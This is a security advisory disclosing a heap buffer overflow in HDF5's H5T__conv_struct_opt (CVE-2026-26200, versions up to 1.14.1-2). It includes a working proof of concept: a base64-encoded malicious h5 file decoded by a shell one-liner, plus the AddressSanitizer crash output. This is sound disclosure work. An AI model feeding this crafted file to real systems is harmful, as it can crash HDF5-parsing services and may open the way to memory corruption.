Skip to content

H5T__conv_struct_opt Heap Buffer Overflow

High
bmribler published GHSA-5p2m-j456-9mr2 Feb 14, 2026

Package

No package listed

Affected versions

<=1.14.1-2

Patched versions

1.14.4-2

Description

Summary

An attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems.

Note: CVSSv3.1 scoring has been based off previous heap-based buffer overflows reported in the HDF5 project. This assumes the attacker can successfully exploit the vulnerability for remote-code execution purposes, and operates on the assumption that an attacker is coercing a target user into parsing a malicious file with h5dump. Other scenarios, such as a server-side process that parses attacker-controllable h5 files, may be exploitable without user interaction.

Details

The following write-based heap overflow was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger an out-of-bounds write in the H5T__conv_struct_opt method.

This was tested against https://support.hdfgroup.org/ftp/HDF5/releases/hdf5-1.14/hdf5-1.14.1/src/hdf5-1.14.1-2.tar.gz which was built with GCC10 and address sanitizer, as follows:

export CFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
export CXXFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
./configure
make -j8
make install

PoC

The following PoC shows the ASAN output detailing the heap-overflow location.

$ echo "H4sICAIuv2QAA2U5MmQ2YTY2Y2NlYjgyNGUzZmJmOTY5MGRlNGRmZDVkAOv0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcqHyY/A4mBhzgLViVh6tjAIhnABVVgNINbNh1wUwOCXJ1ZWBghNuHbq8FK4TmwDDgOTZTP2O3rQNE/MLlAxygnkT1eMEC0oxnR+XeQ+awkmbzf5L88Z+wEgoAE4MDbpv//3+CKcoI1MPIAk9PAoLAdMsIZMyAyidgqGcDyXOAFYE0ACEIbICmwwxGmDoBKP3//1Mg/Q+qnw8kDrTMyAAITA0tDU1NTEwNQQZKgI1kZAKRD/7/gGYeUIaCuG0CpuPfQBIyE9z1OD2PFzzFFPrfiSn0vx4WeQ2SDPJYTfpg79hgDKRPHAJip4BGZmgwNdhD5B/YO81GyBtMN2aAZPsGh1AwuGrvDOZD5EFykGAQcITov2DvgiQPCnIWiH6jWTNB4KS9K0T+4AuofkhiPuEIMf+ovRuSfhALEm0CTpNUPIHokL07TD7lhBPIbkhGcQGzGW4csPdAsx9SbjQ4yRwvBKI99p5o7ucE8xc5gd1XvdPeC0leE1j8BPv5uzACQwlW/rxALgdJLVFwASmQE8nS+QdEvMMUl6XANUjgJ8k6+AnIOxYVJVb6dwaXFJU2MJQWpRZDxaHZEp5FmBkSGEFiYsAEZAukE+PzEnNTCdkOzO3asDSnwJAE1cNCQJeggvxvZqgecQ4G8XwgKxmqF6PewdBrD1XjwGDCzWCKZADEN8gGoGZKRjEmcKlXn5yRWITsvaf/sZXCiXCWMBDLCcsxJILCEqgRHnhoAJxUYYVCCtA18vIMPEj+BFVwAKDQPF0YCAAA" | base64 -d | gunzip -c > e92d6a66cceb824e3fbf9690de4dfd5d
$ ./hdf5/bin/h5dump ./e92d6a66cceb824e3fbf9690de4dfd5d
HDF5 "./e92d6a66cceb824e3fbf9690de4dfd5d" {
GROUP "/" {
   DATASET "ArrayO�Stru�" {
      DATATYPE  H5T_COMPOUND {
         32-bit big-endian integer 32-bit precision "a_name";
         24-bit little-endian floating-point 32-bit precision "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1970974;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            96-bit big-endian integer 32-bit precision "array_na";
         } "o";
      }
      DATASPACE  SCALAR
=================================================================
==968==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1d2521ab40 at pc 0x7f1d299fc469 bp 0x7ffd71677900 sp 0x7ffd716770b0
WRITE of size 1970980 at 0x7f1d2521ab40 thread T0
    #0 0x7f1d299fc468 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7f1d29557f58 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2642
    #2 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f1d29558171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
    #4 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f1d29105b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f1d290c3221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f1d290f95d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x5566929ed649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f1d2521ab40 is located 0 bytes to the right of 1971008-byte region [0x7f1d25039800,0x7f1d2521ab40)
allocated by thread T0 here:
    #0 0x7f1d29a6ce8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f1d292162ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7f1d292174f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7f1d290f6fa3 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1447
    #4 0x7f1d290f941b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7f1d290f941b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0fe424a3b510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe424a3b560: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0fe424a3b570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==968==ABORTING

Impact

An attacker who can control an h5 file or other hdf5 data parsed by a target system can trigger the heap-overflow. With the proof-of-concept above, this could result in denial-of-service conditions in server-side implementations of the HDF5 library.

Heap-based buffer overflows can result in remote code execution, depending on the specific exploitability of this vulnerability. Real-world exploitability of this issue in terms of remote-code execution is currently unknown.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2026-26200

Weaknesses

Heap-based Buffer Overflow

A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Learn more on MITRE.

Credits